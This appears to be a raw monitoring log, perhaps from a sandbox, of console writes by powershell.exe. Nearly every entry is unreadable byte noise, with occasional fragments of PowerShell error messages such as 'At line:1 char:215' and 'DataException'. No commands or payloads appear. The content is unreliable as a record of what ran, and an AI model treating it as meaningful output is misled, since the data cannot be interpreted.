Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../..................k.... ...............................}..v.....% .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............Y..k.....% .............................}..v....@& .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;..................k.... ...............................}..v.....- .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............Y..k.....- .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G..................k.... ...............................}..v.....5 .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............Y..k.....5 .............................}..v....@6 .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S..................k.... ...............................}..v.....= .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............Y..k.....= .............................}..v....@> .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._..................k.... ...............................}..v.....E .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............Y..k.....E .............................}..v....@F .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k..................k.... ...............................}..v.....M .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............Y..k.....M .............................}..v....@N .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w..................k.... ...............................}..v.....U .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............Y..k.....U .............................}..v....@V .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....] .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k.....] .............................}..v....@^ .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....e .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k.....e .............................}..v....@f .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....m .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k.....m .............................}..v....@n .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....u .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k.....u .............................}..v....@v .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....} .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k.....} .............................}..v....@~ .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s..................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......!.............................}..v....@.!.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......!.............................}..v....@.!.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......!.....0.......................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....H.!.............................}..v......!.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....H.!.............................}..v......!.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v....` !.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k.....!!.............................}..v.....!!.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....&!.....0.......................`.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....x'!.............................}..v.....'!.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ..........k.... ...............................}..v.....+!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....@,!.............................}..v.....,!.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v....../.....0.......................X.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k....`./.............................}..v....../.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.5.............}..v....../.....0................F......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............)".k.....I..............................}..v..... 0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................!.k.....!0.............................}..v....("0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............)".k.....I..............................}..v.....(0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................!.k.....)0.............................}..v....(*0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............)".k.....I..............................}..v.....00.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................!.k.....10.............................}..v....(20.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............)".k.....I..............................}..v.....80.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................!.k.....90.............................}..v....(:0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....@0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....A0.............................}..v....(B0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....H0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....I0.............................}..v....(J0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....P0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....Q0.............................}..v....(R0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....X0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....Y0.............................}..v....(Z0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....`0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....a0.............................}..v....(b0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....h0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....i0.............................}..v....(j0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....p0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....q0.............................}..v....(r0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....x0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....y0.............................}..v....(z0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v..... 1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....!1.............................}..v....("1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....(1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....)1.............................}..v....(*1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....01.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....11.............................}..v....(21.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....81.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....91.............................}..v....(:1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....@1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....A1.............................}..v....(B1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....H1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....I1.............................}..v....(J1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................)".k.....I..............................}..v.....P1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k.....Q1.............................}..v....(R1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............)".k.....I..............................}..v.....X1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'................!.k.....Y1.............................}..v....(Z1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............)".k.....I..............................}..v.....`1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3................!.k.....a1.............................}..v....(b1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............)".k.....I..............................}..v.....h1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?................!.k.....i1.............................}..v....(j1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............)".k.....I..............................}..v.....p1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K................!.k.....q1.............................}..v....(r1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............)".k.....I..............................}..v....xw1.....0.......................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W................!.k....0x1.............................}..v.....x1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............)".k.....I..............................}..v....x.1.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c................!.k....0.1.............................}..v......1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o....... . . .a.d.a.t.a.E.x.c.e.p.t.i.o.n...............}..v......1.....0................F......".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o................!.k....x.1.............................}..v......1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............)".k.....I..............................}..v......1.....0.......................\.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{................!.k....................................}..v....P.1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......)".k.....I..............................}..v......1.....0................F..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................!.k......1.............................}..v......1.....0...............HG..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v.....OC.....0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....PC.............................}..v.... QC.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.6.............}..v....0UC.....0................i......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....UC.............................}..v....hVC.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0]C.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....]C.............................}..v....h^C.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0eC.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....eC.............................}..v....hfC.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0mC.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....mC.............................}..v....hnC.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0uC.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................i..k.....uC.............................}..v....hvC.....0...............hj..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....m..............................}..v....0}C.....0...............................................
